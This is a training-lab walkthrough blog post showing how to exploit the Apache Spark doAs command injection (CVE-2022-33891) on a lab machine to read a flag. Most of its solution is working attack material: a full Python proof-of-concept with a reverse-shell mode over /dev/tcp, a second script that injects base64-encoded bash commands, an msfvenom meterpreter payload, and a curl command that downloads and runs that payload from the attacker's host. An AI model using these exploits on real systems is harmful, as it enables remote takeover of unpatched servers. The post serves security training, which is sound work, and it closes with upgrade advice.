blog
Lab Walkthrough - Apache ...
24 August 22

Lab Walkthrough - Apache Spark Shell Command Injection

Posted byINE
facebooktwitterlinkedin
news-featured

In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

Purpose: We are learning about how to exploit Apache Spark using the Metasploit Framework module. Also, we will use the python language to write/modify existing scripts for exploiting the Apache Spark application. 

Technical difficulty: Beginner

Introduction

In 2022, a critical Shell Command Injection vulnerability was found in the Apache Spark server. The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. An authentication filter, checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as.

This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.

The vulnerability was discovered by Kostya Kortchinsky, a cybersecurity researcher from Databricks.

Read More: https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc

What is Command Injection?

A cyberattack known as command injection includes running unauthorized commands on the host operating system. Usually, the threat actor inserts the orders by taking advantage of an application flaw, like inadequate input validation.

Lab Link: https://my.ine.com/CyberSecurity/courses/ebd09929/cyber-security-vulnerabilities-training-library/lab/0bc4e7a4-7959-4531-b0fd-ab38764a48c7

apache_spark_lab_link.png

Lab Environment

In this lab environment, the user will access a Kali GUI instance. A vulnerable machine Apache Spark deployed on http://demo.ine.local:8080

Goal after completing this scenario: Access the /flag.txt file and read the flag!

apache_spark_0.png

Tools

The best tools for this lab are:

  • Nmap

  • Bash Shell

  • Metasploit Framework

  • Python

What is Apache Spark?

Apache Spark is a multi-language engine for executing data engineering, data science, and machine learning on single-node machines or clusters.

Apache Spark Key features

Batch/streaming data

Unify the processing of your data in batches and real-time streaming, using your preferred language: Python, SQL, Scala, Java or R.

SQL analytics

Execute fast, distributed ANSI SQL queries for dashboarding and ad-hoc reporting. Runs faster than most data warehouses.

Data science at scale

Perform Exploratory Data Analysis (EDA) on petabyte-scale data without having to resort to downsampling

Machine learning

Train machine learning algorithms on a laptop and use the same code to scale to fault-tolerant clusters of thousands of machines.

Source: https://spark.apache.org/

Vulnerability Configuration

  • Enable the ACLs via the configuration option spark.acls.enable. i.e, conf/spark-defaults.conf

Vulnerable Source Code

Link: https://github.com/apache/spark/pull/36315/files#diff-96652ee6dcef30babdeff0aed66ced6839364ea4b22b7b5fdbedc82eb655eeb5L41

private def getUnixGroups(username: String): Set[String] = {
-    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
   // we need to get rid of the trailing "\n" from the result of command execution
-    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
+   Utils.executeAndGetOutput(idPath ::  "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
 }
}

CVE-2022–33891

  • Vulnerable parameter

http://demo.ine.local:8080/?doAs=`[command injection here]`

The command injection occurs because Spark checks the user group membership passed in the ?doAs parameter by using a raw Linux command.

User commands are processed through ?doAs parameter, and nothing is reflected back on the page during command execution, so this is blind OS injection. Your commands run, but there will be no indication if they worked or not or even if the program you’re running is on target.

OS commands that are passed on the URL parameters ?doAs will trigger the background Linux bash process, which calls **cmdseq** and will run the process with the command line id, -Gn.

Source: https://www.socinvestigation.com/cve-2022-33891-apache-spark-shell-command-injection-detection-response

Solution

Step 1: Open the lab link to access the Kali machine.

Kali machine

apache_spark_1.png

Step 2: Check if the provided machine is reachable.

Command:

ping -c 4 demo.ine.local
apache_spark_2.jpg

The provided machine is reachable.

Step 3: Check all open ports on the machine.

Command:

nmap demo.ine.local
apache_spark_3.jpg

Multiple ports are open. The Apache Spark server is running on port 8080.

Step 4: Run the firefox browser and access port 8080 to identify the Apache Spark server version.

URL: http://demo.ine.local:8080

apache_spark_4.jpg

apache_spark_4_1.jpg

The target Apache Spark server version is 3.1.1.

Step 5: Running the command on the target using the vulnerable parameter “?doAs.”

Just type the URL on the Kali terminal.

Command:

http://demo.ine.local:8080?doAs=`id`
apache_spark_5.jpg

Successfully executed id command on the target server and received an output.

Note: You won’t receive the output of all Linux commands

This confirms that the target is vulnerable to CVE-2022–33891

Step 6: Writing a nmap script that will detect the vulnerable spark version, i.e., 3.1.1

Nmap script

-- The Head Section --
description = [[The script to detect The Apache Spark Shell Command Injection vulnerability]]
---
-- @usage
-- nmap --script detect-spark-vuln <target>
-- @output
-- PORT   STATE SERVICE
-- 8080/tcp open  http
-- |_detect-spark-vuln: Apache Spark is Vulnerable to Command Injection
categories = {"default", "safe"}
local shortport = require "shortport"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
-- The Rule Section --
portrule = shortport.http
-- The Action Section --
action = function(host, port)
   local uri = "/"
   local text1 = "3.1.1"
   local response = http.get(host, port, uri)
   if ( response.status == 200 ) then
       local bodystr = string.match(response.body, text1)
       if ( bodystr == text1 ) then
           return "Apache Spark is Vulnerable to Command Injection!!"
       else
           return "Apache Spark Not Vulnerable!!"
       end
   end
end

The script is pretty straightforward. It accesses the target on port 8080 and matches the given string, i.e., 3.1.1, then gives an output if it’s vulnerable or not.

Save the above code on the attacker’s machine and run it. The file extension should be .nse

Commands:

nano detect-spark-vuln.nse

<paste code>

apache_spark_6.jpg

Run the script.

nmap — script detect-spark-vuln.nse demo.ine.local
apache_spark_6_1.jpg

Successfully detected the Apache Spark server version 3.1.1 using a nmap custom script.

Step 7: Running the python script to detect the Apache Spark Command Injection vulnerability

Python Script

#!/usr/bin/env python3
import requests
import argparse
import base64
import datetime
from colorama import Fore
parser = argparse.ArgumentParser(description='CVE-2022-33891 Python POC Exploit Script')
parser.add_argument('-u', '--url', help='URL to exploit.', required=True)
parser.add_argument('-p', '--port', help='Exploit target\'s port.', required=True)
parser.add_argument('--revshell', default=False, action="store_true", help="Reverse Shell option.")
parser.add_argument('-lh', '--listeninghost', help='Your listening host IP address.')
parser.add_argument('-lp', '--listeningport', help='Your listening host port.')
parser.add_argument('--check', default=False, action="store_true", help="Checks if the target is exploitable with a sleep test")
parser.add_argument('--verbose', default=False, action="store_true", help="Verbose mode")
args = parser.parse_args()
# nothing to see here, move along!
headers = {
   'User-Agent': 'CVE-2022-33891 POC',
}
# Colors :D
info = (Fore.BLUE + "[*] " + Fore.RESET)
recc = (Fore.YELLOW + "[*] " + Fore.RESET)
good = (Fore.GREEN + "[+] " + Fore.RESET)
important = (Fore.CYAN + "[!] " + Fore.RESET)
printError = (Fore.RED + "[X] " + Fore.RESET)
full_url = f"{args.url}:{args.port}"
def check_for_vuln(url):
   try:
       print(info + "Attempting to connect to site...")
       r = requests.get(f"{url}/?doAs='testing'", allow_redirects=False, headers=headers)
       if args.verbose:
           print(info + f"URL request: {url}/?doAs='testing'")
           print(info + f"Response status code: {r.status_code}")
       if r.status_code != 403:
           print(printError + "No ?doAs= endpoint. Does not look vulnerable.")
           quit(1)
       elif "org.apache.spark.ui" not in r.content.decode("utf-8"):
           print(printError + "Does not look like an Apache Spark server.")
           quit(1)
       else:
           print(important + "Performing sleep test of 10 seconds...")
           t1 = datetime.datetime.now()
           if args.verbose:
               print(info + f"T1: {t1}")
           run_cmd("sleep 10")
           t2 = datetime.datetime.now()
           delta = t2-t1
           if args.verbose:
               print(info + f"T2: {t2}")
               print(info + f"Delta T: {delta.seconds}")
           if delta.seconds not in range(8,12):
               print(printError + "Sleep was less than 10. This target is probably not vulnerable")
           else:
               print(good + "Sleep was 10 seconds! This target is probably vulnerable!")
           exit(0)
   except Exception as e:
       print(printError + str(e))
def cmd_prompt():
   cmd = input("[cve-2022-33891> ")
   return cmd
def base64_encode(cmd):
   try:
       message_bytes = cmd.encode('ascii')
       base64_bytes = base64.b64encode(message_bytes)
       base64_cmd = base64_bytes.decode('ascii')
       return base64_cmd
   except Exception as e:
       print(printError +str(e))
def run_cmd(cmd):
   try:
       if args.verbose:
           print(info + "Command is: " + cmd)
       base64_cmd = base64_encode(cmd)
       if args.verbose:
           print(info + "Base64 command is: " + base64_cmd)
       exploit = f"/?doAs=`echo {base64_cmd} | base64 -d | bash`"
       exploit_req = f"{full_url}{exploit}"
       if args.verbose:
           print(info + "Full exploit request is: " + exploit_req)
           print(info + "Sending exploit...")
       r = requests.get(exploit_req, allow_redirects=False, headers=headers)
       if args.verbose:
           print(info + f"Response status code: {r.status_code}\n"+ info + "Hint: 403 is good.")
   except Exception as e:
       print(printError + str(e))
       quit(1)
def revshell(lhost, lport):
   print(info + f"Reverse shell mode.\n" + recc+ f"Set up your listener by entering the following:\nnc -nvlp {lport}")
   input(recc + "When your listener is set up, press enter!")
   rev_shell_cmd = f"sh -i >& /dev/tcp/{lhost}/{lport} 0>&1"
   run_cmd(rev_shell_cmd)
def main():
   try:
       if args.check and args.revshell:
           print(printError + "Please choose either revshell or check!")
           exit(1)
       elif args.check:
           check_for_vuln(full_url)
       # Revshell
       elif args.revshell:
           if not (args.listeninghost and args.listeningport):
               print(printError + "You need --listeninghost and --listeningport!")
               exit(1)
           else:
               lhost = args.listeninghost
               lport = args.listeningport
               revshell(lhost, lport)
       else:
           # "Interactive" mode
           print(info + "\"Interactive\" mode!\n" + important + "Note: you will not receive any output from these commands. Try using something like ping or sleep to test for execution.")
           while True:
               command_to_run = cmd_prompt()
               run_cmd(command_to_run)
   except KeyboardInterrupt:
       print("\n"+ info + "Goodbye!")
if __name__ == "__main__":
   main()

Copy and paste the above code into the Kali GUI and run the PoC code to check if target version is vulnerable or not.

Check the script help option.

Command:

python3 PoC.py — help
apache_spark_7.jpg

Running the script to verify the vulnerability.

Command:

python3 PoC.py -u http://demo.ine.local -p 8080 — check — verbose
apache_spark_7_1.jpg

Target appears to be vulnerable.

Step 8: Rewriting a simple python script to execute a command on the target server

Python Script

import requests
import argparse
import json
import random
import string
import base64
my_parser = argparse.ArgumentParser(description='Apache Spark Command Injection')
my_parser.add_argument('-T', '--URL', type=str)
args = my_parser.parse_args()
target = args.URL
def shell(target):
   url = target
   r = requests.get(target)
   if r.status_code == 200:
      print("[+] Exploiting")
      print("[+] Getting the shell... :)")
      while 1:
          try:
              command = input("# ")
              command_to_encode = command.encode('ascii')
              base64_format = base64.b64encode(command_to_encode)
              base64_final_cmd = base64_format.decode('ascii')
              print("Base64 Command: " + base64_final_cmd)
              payload = f"/?doAs=`echo {base64_final_cmd} | base64 -d | bash`"
              exploiting = f"{url}{payload}"
              print(exploiting)
              r = requests.get(exploiting, allow_redirects=False)
              print("Command Executed")
          except KeyboardInterrupt:
              sys.exit("\nBye")
   else:
       print ("[*] Some issue accrued.")
shell(target)

Copy and paste the above code in the Kali GUI and run the PoC code to gain the meterpreter shell.

apache_spark_8.jpg

Check the Attacker Machine IP address:

Command:

ip addr
apache_spark_8_1.jpg

Generate the .elf malicious executable for reverse connection.

Command:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.27.2 LPORT=4444 -f elf > shell.elf
file shell.elf
apache_spark_8_2.jpg

Start Python simple HTTP server to serve the shell.elf file.

Command:

python3 -m http.server 80
apache_spark_8_3.jpg

Start Metasploit multi-handler for the new meterpreter session.

Command:

msfconsole -q
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 10.10.27.2
exploit
apache_spark_8_4.jpg

Check if the script is running correctly by checking its help option.

Command:

python3 New-PoC.py — help
apache_spark_8_5.jpg

It’s working fine. Run the script and download the shell.elf file on the target machine using curl by exploiting the vulnerability.

Command:

python3 New-PoC.py — URL http://demo.ine.local:8080
apache_spark_8_6.jpg

Command:

curl http://10.10.27.2/shell.elf — output /tmp/shell.elf; chmod +x /tmp/shell.elf; /bin/bash -c “/tmp/shell.elf”
apache_spark_8_7.jpg

Successfully downloaded the shell.elf file in the /tmp/ directory and executed it on the target machine. After the execution of the shell.elf file received a meterpreter session:

apache_spark_8_8.jpg

Step 9: Find the flag.

Command:

ls /
cat /flag.txt
apache_spark_9.jpg

FLAG: aad8ee70c54f1cc0c0aad082423b09fe

Mitigation

  • Upgrade to supported Apache Spark maintenance release 3.1.3, 3.2.2, or 3.3.0 or later

References

1. Apache Spark

2. PoC

3. CVE-2022–33891

Try this lab for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

Need training for your entire team?

Schedule a Demo

Hey! Don’t miss anything - subscribe to our newsletter!

© 2022 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.
instagram Logofacebook Logotwitter Logolinkedin Logoyoutube Logo